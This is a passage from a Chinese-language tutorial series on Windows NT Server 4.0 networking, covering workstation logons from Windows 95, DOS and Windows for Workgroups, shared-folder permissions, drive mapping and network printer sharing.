    对于网络协议的选择，应从网络规模、应用类型以及配合其他工作站等方面来考虑。比如，单域、与Internet没有联系的小型局域网，可以采用高效、快速的NetBEUI协议；反之，则必须采用TCP/IP 协议；而如果要运行采用SPX/IPX协议的应用程序，还必须安装NWlink协议。

5.使用正确的域名和工作组名
    工作站登录服务器时必须提供登录的三个要素——用户帐号名、密码和要登录服务器的域名。同时，当NT域中存在工作组管理方式时，应事先规划好工作组划分规则和每个用户的工作组归属。

二、 从Windows 95工作站登录NTS4.0服务器

    目前，由于Windows 95操作系统是绝对的主流PC操作系统，因此，以Windows 95工作站方式登录到NTS4.0服务器，必然是最普遍采用的登录方式。下面将分步详细介绍实现过程：
1.安装并设置网卡
    首先，将网卡插入计算机中相应接口的扩展槽，并确保工作站已通过网线与服务器完成了正确的物理连接。进入Windows 95“控制面板”并双击“网络”图标，选取图1所示“网络”设置对话框中的“配置”项后，单击“添加”按钮；此时将出现图2所示“选定网络组件类型”对话框，选择对话框列表下方的“适配器”后单击右边的“添加”按钮;在随后弹出的“选定网络适配器”对话框（图3）左边的“厂商”列表中选择网卡生产厂商，之后在右边“网络适配器”列表中选择网卡的具体类型，单击“确定”按钮，系统就会从Windows 95安装盘上安装对应的网卡驱动程序。如果网卡类型不在列表之中，但该网卡提供了驱动程序软盘；或者拥有更新版本的驱动程序，可以利用“选定网络适配器”对话框右下方的“从磁盘安装”按钮来添加驱动程序。单击此按钮，根据系统提示信息，输入驱动程序所在盘符和路径（通常为A:\WIN95），系统将自动完成驱动程序安装。如果网卡符合PnP（即插即用）标准，当将网卡插入计算机并重新启动后，系统会自动发现新添加的网卡，并引导你完成网卡驱动程序的安装。
    不管是ISA网卡还是PCI网卡、不管是否支持PnP，在Windows 95中，网卡IRQ（中断）或I/O地址与系统已有硬件冲突的情况并不少见。当发现冲突，应首先尝试在“控制面板”的“网络”设置中去调整网卡IRQ或I/O地址。在图1所示对话框中选择网卡并单击“属性”按钮，随后在“属性”对话框中选择“资源”标签，在图4所示对话框中，对发生冲突的一项（前面带有*号）进行修改，直到无冲突（*号消失）后按“确定”按钮即可。如果系统重新启动后网卡仍不能正常工作，应运用网卡自带的硬件诊断程序，来查看或修改网卡占用的IRQ和I/O地址，必要时甚至可以考虑屏蔽掉网卡对PnP功能的支持。

2.设置登录方式
    Windows 95能以多种网络客户的身份登录对应的网络服务器（比如Novell、Banyan等），但要登录NT服务器，应该采用“Microsoft网络客户”的登录方式。在图2所示“选定网络组件类型”对话框中选择“客户”一项并单击“添加”按扭，将出现图5所示“选定网络客户”对话框；在“厂商”列表中选择“Microsoft”，之后在右边的“网络客户”列表中选择“Microsoft网络客户”，点击“确定”按钮完成设置。

3.选择网络协议
    网络协议是网络中计算机之间通信的“标准语言”。如果要登录NT服务器，工作站端必须选择至少一种服务器已经运行的网络协议。在图2所示“选定网络组件类型”对话框中选择“协议”一项并单击“添加”按钮，将出现图6所示“选定网络协议”对话框；在“厂商”列表中选择“Microsoft”一项，之后在“网络协议”列表中选择所需要的协议，按“确定”按钮完成设置。如果选择了TCP/IP协议，还必须指定本机IP和掩码。

4.设置网络环境
    在图1所示“网络”对话框中，首先确认“基本网络登录方式”一项为“Microsoft网络客户”，然后在“下列网络组件已被安装”列表框中选择“Microsoft网络客户”，单击“属性”按钮将出现图7所示“Microsoft网络客户属性”对话框；点选“登录到Windows NT域”一项，并输入所要登录的NT域名（C&C），单击“确定”后返回图1所示的对话框；选择图1中的“标识”标签项，然后在图8所示对话框中的“计算机名称：”栏内输入工作站名称（该名称在同一网络中必须唯一），在“工作组：”栏内输入该工作站所隶属的工作组名（这里使用工作组仅仅是为了在“网络邻居”中方便查找用户，它和NT域中的用户组的概念是完全不同的，具体内容请参看第一讲）或NT域名。如果要将域中用户分组管理，那么在这里可输入该用户所属的工作组名，否则输入服务器的域名；在“计算机描述：”栏内可随意输入描述该工作站的说明性文字。单击“确定”按钮，设置完成。

5.让工作站登录服务器
    当以上所有设置结束后，重新启动计算机，将出现图9所示的登录对话框，提示输入登录NT域的用户名、口令和域名。如果该工作站登录Windows 95的用户名和登录NT域的用户名不同，则当域用户登录验证成功后，系统会再次弹出登录Windows 95的对话框，要求输入用户名和密码。若登录成功，“网上邻居”中将出现本工作站的名称，同时网络服务器和网络中的其他工作站也能在“网上邻居”中查找到该工作站。
    如果登录失败，应从以下几个方面去查找故障原因：① 检查工作站至服务器间的物理连接是否正常。这包括检查网线和连接设备等是否正常，可尝试用一条网线将工作站与服务器直接连接，看是否能够登录；② 检查是否已在服务器上创建了该用户帐号，并仔细检查登录时所使用的用户名、口令和域名是否正确。如果还无法登录，可尝试用NT内置的“Guest”帐号（不需密码）登录NT服务器；③ 查看工作站端安装的网络协议与服务器是否一致，这一点很容易被忽视；④ 用杀病毒软件检查该工作站是否感染了病毒。
    从运行Windows 98的工作站登录NT服务器的设置方法和过程与Windows 95没任何区别；此外，NTW的安装和设置与NTS4.0服务器也非常相似，只不过NTW是一个工作站操作系统，所以在设置过程中只要搞清楚各自的身份，对相应的输入项目作适当调整就可以了（其具体设置过程可参看第二讲有关内容）。因此，从Windows 98和NTW登录NT服务器的实现过程在此就不再赘述。

三、 从DOS工作站登录NTS4.0服务器

    许多单位在组建NT网络时，都可能面临着低配置机器上网的问题。这些机器包括386和低档的486系统，它们显然无法正常安装运行Windows 95操作系统。在这种情况下，利用DOS操作系统登录NT服务器是一种选择。虽然笔者极不情愿使用这种方法（因为后面还有更好的实现办法），但是在实际应用中“苦恋”着DOS的人确实还不少，故在此有必要将其实现办法介绍给大家。
1.制作DOS端的安装磁盘
    可以使用NTS4.0提供的LAN Manager和Microsoft Network Client V3.0 for MS-DOS and Windows两个网络客户软件，来实现DOS工作站登录NT服务器。在此仅介绍后者的使用方法。
    首先准备两张空白软盘，并将NTS4.0的安装光盘放入光驱。然后在NT服务器上运行“开始/程序/管理工具（公用）/网络客户管理器”，待出现图10所示“网络客户管理器”窗口后点选 “制作安装磁盘组”一项；然后在图11所示“共享网络客户安装文件”窗口中勾选“使用已有的路径”，并在上方的“路径”栏内输入存放安装文件的正确路径（具体位置为“安装光盘\Client\MS Client\disks”，此时只需输入“光驱驱动器名：\Client"）；按“确定”按钮后，在弹出的图12所示“制作安装磁盘组”窗口内选择列表中的“Network Client V3.0 for MS-DOS and Windows”，然后根据系统提示完成两张安装磁盘的制作。建议给这两张磁盘贴上标签（DISK1和DISK2）。

2.安装并设置DOS工作站
    在保证网卡工作正常的情况下，进行以下设置：运行刚才制作的安装软盘（DISK1）中的SETUP.EXE安装程序，待出现“Setup for Microsoft Network Client V3.0 for MS-DOS”的安装界面后按回车继续；根据提示输入NT网络客户软件的安装路径（默认为C:\NET）和用户名后，将出现图13所示的修改工作站配置的界面；选择界面中的“Change Names”一项，随后根据图14所示界面的提示更改用户名（Change Users Name）、计算机名称（Change Computer Name）、工作组名(Change Workgroup Name)和域名(Change Domain Name），修改完毕后，选择“The listed name are correct”一项确认并返回图13所示的界面；然后选择“Change Network Configur
ation”一项，在图15所示界面中选择“Add Adapter”添加网卡驱动程序，当出现选择网卡类型的列表时，选择所安装网卡的名称。如果列表中没有相应选项或无法确认网卡类型，可选择列表中的“*Network adapter not shown on list below...”一项手工添加网卡附带的驱动程序。根据提示输入网卡驱动程序的路径（一般为“A:\LANSRVR\DOS”），系统会显示网卡的类型并自动从软盘安装对应的驱动程序；添加完网卡驱动程序后，在图15中选择“Add Protocol”一项，然后在图16所示安装网络协议的界面中选择正确的协议（NetBEUI一项必选），确认后返回图15所示的界面。一步步完成以上设置后，系统开始从磁盘复制NT DOS客户程序，复制结束后自动修改CONFIG.SYS和AUTOEXEC.BAT两个系统文件。

3.从DOS工作站登录NT服务器
    重新启动计算机，如上述设置无误，系统将自动开始登录过程。先确认或重新输入正确的用户名，接着输入并再次确认密码，登录成功将显示“The command completed successfully”。DOS工作站登录NT服务器后没有“网上邻居”工具来浏览网络上的工作站，但可以通过NET VIEW命令把所有与该工作站相连的计算机名称全部显示出来。登录服务器后，在DOS工作站上以下几项操作应该掌握：① 浏览网络资源。键入NET命令，将出现图17所示窗口，选择“Browse”一项，在随后出现的图18所示窗口中，就能查看到可共享的所有网上资源；② 映射共享文件夹。可以使用NET USE命令映射远程工作站上的文件夹资源（具体方法将在第五讲中介绍，或参看命令NET USE/？的返回信息），也可以在用NET命令浏览网络资源时，用窗口操作的方式完成对文件夹的映射；③ 登录入网。在DOS提示符下键入NET LOGON命令即可登录入网；④ 注销登录。当需要与网络断开连接或关机时，应该先输入NET LOGOFF命令注销登录。

4.从Windows 3.x登录NT服务器
    要从Windows 3.x登录NT服务器，首先必须确保工作站已经以DOS方式登录到了NT服务器。然后启动Windows，利用“主群组/Windows设置程序”查看并确定“网络”一项，如果显示为“Microsoft Network [or 100% compatible]”，说明已能共享网络资源了。此时如果要进行网络连接，可通过“文件管理器/磁盘/网络连接”窗口来完成。在此，笔者极力建议大家不要使用Windows 3.x加入NT网络。因为这种登录方式对内存容量要求比较高，当从DOS登录服务器后，Windows 3.x往往会因内存不足而无法启动（当笔者从配有8MB内存的486计算机登录时，因内存不足而失败）。所以，针对这种低配置的系统，除选用DOS操作系统外，推荐采用微软的Windows for Workgroup 3.11操作系统来实现登录NT服务器。

四、 从Windows for Workgroup 3.11登录NTS4.0服务器

    Windows for Workgroup（以下简称为WFW） 3.11是一个具有网络增强功能的Windows操作系统。与Windows 3.x相比，它内置了对“点对点”连网方式的支持，并集成了一些网络必备的功能组件。它对硬件的要求较低，只要具有4MB RAM、20MB硬盘空间的386以上兼容机就可以安装运行。

1.安装并认识WFW操作系统
    WFW有Windows升级版和标准版两个版本，它们的具体安装过程都与Windows 3.x没什么区别，熟悉Windows的用户都可以轻松完成安装。当WFW安装完成并启动进入Windows操作界面后，你会发现“Main”组中多了一个名为网络“Network”的程序组，WFW网络功能的设置就是靠这个程序组来完成的（由于WFW没有中文版，下面文中图片都是在运行了Richwin 4.1 for Windows汉字平台后截取的) 。

2.设置WFW的网络功能
    与DOS和Windows 3.x相比，设置WFW的网络功能是一项较轻松的工作：① 设置网络功能。打开“网络”（Network）程序组，双击“Network Setup”图标，出现图19所示“Network Setup”窗口，选择“Networks”选项，在随后出现的图20窗口中选择 “Install Microsoft Windows Network”一项，同时点选下方的“No additional network”，然后单击“确定”按钮返回；② 设置共享功能。在“Network Setup”窗口点击“Sharing”按钮，将出现图21所示“Sharing”窗口，此窗口中上、下两个选项分别是共享文件和打印机，可根据实际需要选择；③ 设置网卡参数及网络协议。单击图19中的“驱动程序”（Drivers）按钮，将出现图22所示的“Network Drivers”窗口。点击“Add Adapter”按钮安装网卡驱动程序（最好选择从磁盘安装），并设置网卡的I/O和IRQ参数，当中断发生冲突时系统会自动告诉你并让你调整。接着选择图22窗口中的“Add Protocol”一项，安装所需的网络协议，建议选择“NetBEUI”协议。

3.从WFW工作站登录NT服务器
    选取“Main（主群组）/Control Panel（控制面板）/Network（网络）”窗口，在图23“Microsoft Windows Network”窗口中的对应栏内输入正确的计算机名称、工作组、描述和用户名，然后单击左下角的“Startup”按钮；在随后出现的图24所示“Startup Settings”窗口中点选“Log On to Windows NT or LAN Manager Domain”一项，其他选项使用系统默认值，在“Domain Name”栏内输入服务器的域名（C&C）,单击“OK”返回图23所示窗口。此时，可以单击“Log On”或重新启动计算机来登录NT网络。在图25所示的登录窗口中输入正确的密码后就可完成登录。
    登录后，进入主群组（Main）下的文件管理器（File Manager）窗口，选择窗口下的磁盘（Disk）下拉菜单，可发现连接网络驱动器（Connect Network Drive）一项可选（如登录失败，此项不可选）。选择此项，在随后出现的图26所示窗口中可以查看所有可被访问的网上资源。当要注销登录时，可单击图23中的“Log Off”按钮（Log On按钮在登录后自动变为Log Off）。
    最后需说明的是，当从DOS、Windows 3.x和WFW登录NTS4.0服务器后，你可以在安装有这三种操作系统的工作站上查看到Windows 95/98/NT的计算机名，而在Windows 95/98/NT的“网上邻居”中却看不见以上三种工作站的计算机名。

返回


NT4.0组网技术系列讲座(五)

《一键清理系统垃圾》

NT4.0组网技术系列讲座(五)

NT网络的资源共享

    建立网络的目的就是为了连接独立运行的计算机实现系统资源的共享，否则网络也就失去了存在的意义。本讲将介绍在单服务器的网络中设置资源共享的方法。在多服务器（多个域）组成的网络中，可通过设置域与域之间的信任和委托关系来实现不同域之间资源的共享，这部分内容在本讲中暂时不去涉及。

一、 几个概念

1.共享
    NT网络中的共享是指将本地系统资源（如文件夹和打印机等）提供给其他网络用户使用。网络中所能访问的仅指那些已设置了共享属性的资源，未被设置共享属性的网上资源是不能被直接访问的。任何一种资源必须先设置一个共享名，才能被他人识别和使用。
2.共享资源
    网络中的共享资源是指一切可供网络用户使用的资源，这些资源大致分为网络设备和网络数据两类。打印机是最常用的可被共享的网络设备，而网络数据主要包括文件、文件夹（目录）和应用程序等。虽然软驱、硬盘和光驱也是硬件设备，但Windows NT在任何时候都将它们视为文件夹加以管理、使用。
3.权限
    “权限”的定义和设置直接关系到网络安全。NT中权限涉及的内容较多，在此仅介绍常用的两种：用户权力(User Rights)和共享权限(Share Permission)。用户权力指用户或组登录并访问NT服务器的权力。在单服务器系统中，用户权力使用较少，而在多服务器系统中，常常通过给用户或组设置不同的权力来限制其访问指定的服务器；共享权限与网络资源紧密联系，它规定了用户或组对共享资源存取的级别。单服务器网络中的权限，主要是指共享权限。合理分配用户的权限，可以达到安全、有效地管理、利用网络资源的目的。多服务器网络中用户权力和权限的使用，在本讲中暂且不涉及。

二、 文件夹共享属性的设置

    NT只能将文件夹(目录)作为共享资源，而不能对单个文件进行共享设置。将一个文件夹设置为共享后，该文件夹下的所有文件及下层文件夹（子目录）也就同时拥有此属性，即共享文件夹下的所有数据都可以被网上用户访问。
1.在NTS4.0服务器上添加共享文件夹
    设置过程如下:①以Administrator身份登录 NTS4.0服务器，打开资源管理器，选择要设置共享的文件夹名，按鼠标右键，选择快捷菜单中的“共享”选项，在出现的共享对话框中单击“共享”标签，如图1。如果服务器的内存少于16MB，将无法对文件夹设置共享属性。此时，可打开控制面板，双击“服务”图标，在图2所示对话框列表中选择“Server”并单击对话框中的“启动”按钮，强行启动“Server”功能即可设置共享。为此，建议NTS4.0服务器的内存不要少于32MB;②点选图1中“共享为”选项以确定该文件夹的共享名，缺省时共享名与原文件夹名相同，用户可任意更改。共享名最长可取12个字符，如网络中有DOS工作站，应尽量使共享名长度不超过8个字符，并遵循DOS文件的命名规则;③“备注”栏内可输入一些说明文字。如果想限制同时访问此文件夹的用户数，请选择“用户个数”下方的“允许...个用户”项，并输入最大个数，系统默认为“无限制”。此选项主要迎合某些软件的特殊要求，比如一些限制最大用户数的网络软件;④当选择“权限”按钮后，可设置共享文件夹的权限。设置完成后，该文件夹图标将变为被一只手托着的文件夹。设置了共享属性的文件夹也可随时停止共享，方法与设置共享的操作相似，只须在与图1相似的对话框（注意多出了几个按钮）中单击“不共享”即可。在对某个文件夹停止共享前，应确定已没有用户使用该文件夹下的数据，否则会导致用户数据的丢失。
另外，同一工作组内的用户可以互相访问工作站上的资源（当网络规划中没有使用工作组时，一个域名即为概念上的一个工作组），在Windows95/98/NT工作站上资源共享的设置方法与在NTS4.0服务器上的设置基本相同。

2.设置共享文件夹的使用权限
    执行与添加共享文件夹同样的步骤，直到出现与图1相同的窗口。单击窗口中的“权限”按钮，在随后出现的图3所示对话框中，可为不同的用户分别设置各种权限。新建立共享的文件夹，NTS4.0的默认设置是“Everyone”，即每个用户对该共享文件夹拥有“完全控制”的权限。这样的权限设置和网络安全的要求是不符的，通常应根据用户不同特征，给每一共享文件夹分别赋予不同的共享权限。因此，应先将“Everyone”从对话框列表中“删除”。然后单击“添加”按钮，进入图4所示的“添加用户及组”对话框，重新进行用户权限分配。这时有两种选择——为用户组授权或为单个用户授权。为组用户授权可使组中每一成员对该共享文件夹具有同等的使用权限。从对话框的“名称”列表中选择欲赋予使用权限的组名(如STU)，按“添加”按钮后该组将显示在“添加名称”列表中。然后从对话框下方的“访问类型”列表中选择该组的权限(共有四种文件权限，见图4下方弹出列表)，也可返回图3所示的对话框后再完成组用户权限的设置;出于建立更加完善的安全性的考虑，有时需要为同一个组中某个或某些用户赋予不同的权限。此时，可按如下步骤设置。首先在图4中点选组名，然后单击对话框中的“成员”按钮，将出现图5所示“全局组成员”对话框。从该对话框中罗列的组用户名单中选择用户名（一次可选多个），单击“添加”按钮后，回到图3或图4的对话框，都可对他们设置相应的权限。以上操作充分体现了组（用户组）在管理用户帐号中的重要性和灵活性。
    当磁盘文件系统为NTFS时，借助NTFS更高级别的安全性设计，可以实现对共享文件夹更完整的安全性设置，见图6。这些设置包括对文件夹、甚至单个文件更详细的使用权限（Local Permission），见图7;用户的对共享文件夹操作的审核（操作记录），见图8;文件夹、文件所有权的更改，见图9。这些高级的安全特性都是FAT文件系统无法实现的，因此，建议在安装NTS时选用这种先进的文件系统。

3.设置共享文件和文件夹的属性
    共享文件、文件夹和文件属性的含义与DOS、Win9x下的文件属性大致相同，除包括只读、归档（档案）、隐藏和系统四种属性外，NTFS文件系统中还多了一项“压缩”属性，见图10。设置文件属性的操作，与在Win9x中完全一样，这里不再赘述。有两点需要强调的是，第一，文件夹的属性和该文件夹下文件的属性是独立的，即当给文件夹设置了一种或几种属性后，它只对该文件夹起作用，而对文件夹下的文件不起作用；第二，当给某文件夹设置了“隐藏”属性后，在工作站上将无法查看到该文件夹名，但如果你确实知道被隐藏的文件夹名和文件名，在访问时可在共享文件夹名的后面加一个“$”符号，例如：\\NTS01\PROGRAM$。

4.从工作站映射网络驱动器
    远程工作站或服务器中已经设置共享属性的文件夹，必须在网络工作站上将其映射为网络驱动器，才能真正实现文件资源的共享。下面我们将详细介绍从Windows95、DOS和Windows for Workgroups 3.11(以下简称为WFW)工作站上映射网络驱动器的方法。
    ①从Windows95工作站上映射网络驱动器。
    打开“网上邻居”窗口，找到并双击远程共享文件夹所在的计算机名（如服务器名:NTS01）;在新弹出的窗口中点选该共享文件夹，然后在“文件”下拉菜单中选择“映射网络驱动器”功能项;此时将出现图11所示的对话框，在“驱动器”栏内选择映射后的网络驱动器名；如果每次进入网络后都要保持与该文件夹的映射关系，可选择“登录时重连接”一项;单击“确定”后完成网络驱动器映射操作。此时在资源管理器左边的文件夹窗口中，会增加一个驱动器图标（与普通硬盘驱动器图标不同的是，这个图标的下边会多出一根管道，令人联想到网络）。此外，在Windows98/NT上映射共享文件夹的方法与在Windows95中的方法基本相同。
    ②从DOS工作站上映射网络驱动器。
    如果是DOS用户，在保证DOS工作站已成功登录到NT服务器的情况下，可利用“NET USE”命令完成网络上共享文件夹的映射连接。例如，要将域中的NTS01服务器上的共享文件夹“Program”映射成网络驱动器“G:”时，可键入如下命令“NET USE G: \\NTS01\PROGRAM”。这里，网络驱动器名与远程共享文件夹完整路径（由计算机名+共享文件夹名组成）之间必须用空格键分开，而且计算机名前面是两个左斜杠“\\”。另外，还可以直接在DOS提示符下输入NET命令，用它提供的一个人机交互的界面来完成共享文件夹的映射操作，具体内容请参看本讲座第四讲有关内容。需要记住的是，当DOS工作站关机之前，应先撤消对网络驱动器的映射，以免打开的远程共享文件数据丢失。这可以用Net use G:/delete命令实现。
    由于DOS系统只能识别8.3格式的文件名，Windows95/98/NT中长文件名的应用程序在DOS环境下无法运行。所以，当网络中存在DOS工作站时，在Windows95/98/NT系统中建立文件时，应尽量将其命名为DOS可识别的格式。
    ③从WFW工作站上映射网络驱动器
    WFW工作站可通过主群组下的文件管理器来共享网络上的资源。选取“Main/File Manager/Disk/Connect Network Drive”，将出现图12所示的对话框，在对话框的“Show Shared Directories on”列表框中选择远程工作站或服务器，然后在下方的“Shared Directories on \\...”列表框中选择该远程计算机上对应的共享文件夹；然后在“驱动器”(Drive)栏内选择一个映射驱动器名，单击“确定”(OK)后，这个驱动器名将会在文件管理器的窗口中出现，这时你可以象使用本地的文件或设备一样来共享网上资源了。如果要断开网络的映射,可利用“Disk/Disconnect Network Drive”选项，在出现窗口的“驱动器”(Drive)列表中选择要断开的映射关系，单击“确定”(OK)按钮即可。

三、 网络打印机的添加和管理

1.什么是网络打印机
    在网络中，不但可以将文件和文件夹提供给网上用户使用，而且还可以将打印设备提供给网上用户共享，这就是所谓的网络打印机。为了更加清楚地理解网络打印的概念，我们将网络打印机分为打印设备和打印机两类：其中打印设备专指物理打印机（确确实实能看得到的打印机），而打印机在这里被视为一个逻辑设备，它是程序与打印设备之间的软件接口(看不到实物)。同时，我们将连接打印设备的计算机叫做打印服务器。打印服务器可以是专用的，也可以由文件服务器或用户工作站兼任。
    要实现打印机的共享，必须注意以下三点:一是连接打印机的计算机(打印服务器)必须能让其他用户访问(已登录到NT域);二是该打印机必须设置为共享状态;三是需要打印文件的用户必须指定文件由谁来打印。以下讲述的打印机的添加和管理也是从这三个方面来考虑的。将普通打印机作为网络打印机前，首先要将其连接到一台计算机(打印服务器)上。还有两种实现网络打印的解决方案，一是使用专用的打印服务器设备用于连接普通打印机，实现打印共享;另一种是购买自带网络接口的打印机，它不需要计算机作为中介，而是直接连接到网络上。这两种都是“货真价实”的网络打印机，一台打印机就是一个打印服务器。本文中使用的打印机为普通打印机。
2.选择打印服务器
    首先要考虑将打印设备连接到网络上的哪一台计算机，即由哪一台计算机作为打印服务器。为了方便用户的访问，可以考虑将网络服务器兼做打印服务器，也可任选一台工作站来充当打印服务器。选择打印服务器时必须考虑的另一个问题是操作系统。理论上DOS、Windows 3.x和Windows for Workgroups 3.11工作站都可作为文件服务器，但在运行这些操作系统的计算机上设置网络打印机是一项极为繁琐的工作，且不利于发挥网络打印机的功能，也不利于网络的日常管理和维护。比较理想的是使用安装有Windows 95/98/NT的计算机作为打印服务器。选择好打印服务器后，将打印机连接到打印服务器的并行口(一般为LPT1)上。(下文实例中选用的是一台运行Windows 98的工作站兼做打印服务器，计算机名为LFJ，使用HP-5L激光打印机）。
3.在打印服务器上添加打印机
    在打印服务器上，通过“添加打印机向导”来完成添加打印机。具体步骤如下:①选择“开始/设置/打印机”，在出现的窗口中双击“添加打印机”图标，出现“添加打印机向导”窗口后单击“下一步”。当出现图13所示的提示信息时，点选“本地打印机”一项（用于设置打印服务器连接的打印设备，只有通过这一项才能将打印设备设置为共享）;②单击“下一步”将出现图14所示的对话框，在对话框中选择正确的“生产商”和“打印机”。如列表中没有与你的打印设备相符合的选项时，可以利用打印机提供的驱动程序软盘，选择“从软盘安装”;②单击“下一步”后，在出现的窗口中给打印机分配一个端口，一般为LPT1。继续“下一步”并默认给出的打印机名（也可更改，但无意义）;④单击“下一步”后“安装向导”问你要不要测试打印机，最好测试一下，虽然要“浪费”一张纸，但也避免了设置上可能存在的错误。按“确定”后，添加结束。
4.将打印设备设置为共享状态
    为了让添加的打印设备可被网上用户使用，必须将它设置为共享状态，该设置操作也是在打印服务器上完成。选取添加打印机后生成的打印机图标，选择“文件”下拉菜单中的“共享”功能项，在出现的对话框中选择“共享”标签，如图15所示。在对话框中选择“共享为”一项，并在“共享名”栏内输入正确的共享名。为了保证DOS工作站能够使用该网络打印机，共享名不要超过8个字符（如HP5L）。对网络打印机，同样可以设置用户权限，而且，为了限制未经授权的用户将数据资料打印带走，还可选择“密码”选项并输入密码。这样，当合法用户访问此打印机时也必须输入正确的密码，否则拒绝访问。
5.如何从工作站端使用网络打印机
    这儿的工作站是相对于打印服务器而言的。要在工作站上使用网络打印机，必须设置网络打印机的网络路径，并指定打印机类型，完成将网络打印机映射成本地打印机的操作。结合第四讲内容，以下介绍在Windows95、DOS和Windows for Workgroups 3.11工作站上使用网络打印机的方法:
① 从中文Windows95工作站使用网络打印机
    在使用网络打印机之前，必须先在工作站本地系统上添加网络打印机。在工作站上安装打印机时也使用“添加打印机向导”来完成，不过要保证打印服务器已经正常上网，且能与你的工作站连通。设置时前面的步骤与前文中添加打印机相同，只是到了图14所示的窗口时，选择“网络打印机”一项。单击“下一步”后，在图16所示的对话框的“网络路径或队列名”栏内，输入网络打印机的正确路径和名称（\\LFJ\HP5L）。也可单击“浏览”按钮，在出现的“浏览打印机”对话框中直接选取。如果还要从DOS应用程序中使用网络打印机，应该勾选下方“从基于MS-DOS的程序打印吗？”的“是”一项。单击“下一步”后，出现图17所示的对话框，在对话框的“打印机名称”下方输入打印机名。如选择了要从基于MS-DOS的程序打印选项，此处的打印机名也不能超过8个字符。如果需要，可将该网络打印机设置为默认打印机，这样，即使工作站有本地打印机，打印操作也是首选网络打印机来完成打印。单击“下一步”后，进行打印测试。测试正确后，单击“完成”结束设置。打印时使用网络打印机的方法与使用本地打印机没任何区别，只要选择正确的打印机名就可以了。从运行Windows95/NT的工作站上设置网络打印机的方法与Windows98基本相同。
②从DOS工作站使用网络打印机
    如果要从DOS工作站上使用NT网络中的打印机，必须先进行以下两项设置：第一项是在工作站上安装打印机驱动程序。如HP5L激光打印机随机器带有一张DOS下的打印驱动程序盘，只需运行安装文件（SETUP.BAT），在窗口信息的提示下进行安装即可；第二项是进行网络连接。网络连接时使用“NET USE”命令，例如：你要连接LFJ计算机上名为HP5L的打印机时，需输入：“NET USE LPT1: \\LFJ\HP5L”（请注意打印机端口名LPT1后面必须加“：”号）。连接前为了证实工作站是否已与打印服务器连接正常，可使用“NET VIEW”命令先查看一下。经过以上两步的设置，就可以按照一般的方式进行网络打印了。如果你要中断已连接的网络打印机，则可使用“NET USE LPT1: /DELETE”命令。
③从WFW工作站上使用网络打印机
    在基于DOS的操作系统中，WFW的网络功能是最完善的，所以许多网络用户对WFW都有一种特殊的偏爱。从WFW工作站使用网络打印机前也要进行以下两步的设置：第一步，安装打印机驱动程序。选择“主群组/控制面板/打印机（Main/Control Panel/Printers）”，将出现图18所示的窗口，从“打印机列表”（List of Printers）中选择打印机驱动程序，然后单击“安装”（Install）按钮，系统将从WFW的安装盘中安装对应的驱动程序。但因WFW推出较早，象HP5L这样的驱动程序在列表中可能找不到，这时应选择从磁盘安装。选择好打印驱动程序后，将进入图19所示的窗口，在此窗口中选择打印机端口，一般情况下选择LPT1。单击“确定”（OK）后，打印机设置结束；第二步，连接网络打印机。在图19中单击“网络”（Network）按钮，将出现图20所示的对话框，在“路径”（Path）栏内输入网络打印机正确的路径。不过最好先从对话框的“Show Shared Printers on”列表中选择打印服务器的计算机名，此时该打印服务器的打印机名将会显示在“Shared Printers on \\...”下方列表中。用鼠标选择共享打印机名，刚才的操作将自动输入“路径”（Path）栏内，而且避免了输入格式上的错误。单击“确定”（OK）后设置结束。也可以利用“主群组”（Main）下的“打印机管理器”（Printer Manager）进行网络打印机的连接。当要断开已建立的网络打印连接时，也可在“打印管理器”窗口中完成。网络打印机连接完成后，其打印操作与使用一般打印机的方法完全相同，如在WORD 6.0、WRITE等软件下可以象使用本地打印机一样方便地进行网络打印。
    最后指出一点，就是在基于DOS的工作站上安装网络打印机，必须要给出厂商的驱动程序而在Win9x及NT上则不一定。另外，如果在Win 9x及NT中映射网络打印机时，打印机列表中能找到对应的打印机型号，则不需打印驱动程序。否则，必须提供厂商的驱动程序，才能完成网络打印机在工作站上的安装设置工作。

编后语:
    各位读者，我们的《NT 4.0组网技术系列讲座》到这一期，已完成了用Windows NT Server 4.0组建局域网所必须的基本知识和具体操作的介绍。通过这五期讲座，我们希望各位对Windows NT Server感兴趣的朋友，都能对这个强大的网络操作系统有一定的认识。如果情形确实如此的话，那我们将感到非常欣慰。但事实上，由于各位读者的网络知识参差不齐，可能我们的讲座对一些偏向更深层次的原理，以及对具体的Windows NT Server组网解决方案实例感兴趣的朋友没有照顾到。在此，对前一类读者我们只能说:“非常对不起”。因为，我们是一本面向初、中级计算机用户、偏向指导读者实际动手解决问题的刊物。而对后一类读者，我们将在以后的几期杂志上，陆续刊登一些使用Windows NT Server 4.0组建无盘工作站、Intranet以及本地小型局域网的实例。在这些后续文章中，我们将详细地介绍各种网络建设方案中，从产品选型、安装、设置到使用中的经验和技巧。我们期待着我们的杂志能给你们一个比较详细、完整的解决方案。各位网络爱好者们，敬请留意。另外，再次欢迎各位读者涌跃投稿，向我们道出您的组网“秘技”，让我们共同提高。

返回


NT4.0组网技术系列讲座(一)

《一键清理系统垃圾》

NT4.0组网技术系列讲座(一)

NT组网基础知识

微软于1996年推出了Windows NT Server 4.0局域网操作系统，该系统提供了一个理想的网络操作系统所必备的环境。相对于局域网中的另一操作系统NetWare（3.x/4.x)，Windows NT Server 4.0在建网时比较简单,而且网络的维护和管理比较容易,非常适合一些非专业用户使用。本系列讲座，将较为系统地介绍NT局域网的组建过程，并结合每一讲的内容，对可能出现的问题进行必要的分析和提供解决办法。
    微软的Windows NT产品分为Windows NT Server（简称为NTS）和Windows NT Workstation（简称为NTW）两种。在以下的讲述中，如果没有特别指明其为Server或Workstation，当提到Windows NT（简称为NT）时，表示两者都适用。另外，如无特殊说明，该系列文章中所指的NT网络是指以中文Windows NT Server 4.0（简称为NTS4.0）作为网络服务器操作系统的局域网。

一、局域网基础知识

    首先，什么是计算机网络？粗略地讲，计算机网络就是将分布在不同地理位置上的具有独立功能的多台计算机、终端及其附属设备，用通信设备和通信线路连接起来，再配以相应的网络软件，以实现计算机资源共享的系统。网络根据地域的不同基本分为广域网（WAN）、城域网（MAN）和局域网（LAN）三大类。局域网顾名思义是指地理分布范围较小的网络，它一般运用于有限距离内的计算机之间进行数据和信息的传送，这个有限距离通常是指一个大楼内部或一组紧邻的建筑群之间，也可小到几间办公室，甚至于一个办公室内部计算机间的连接。
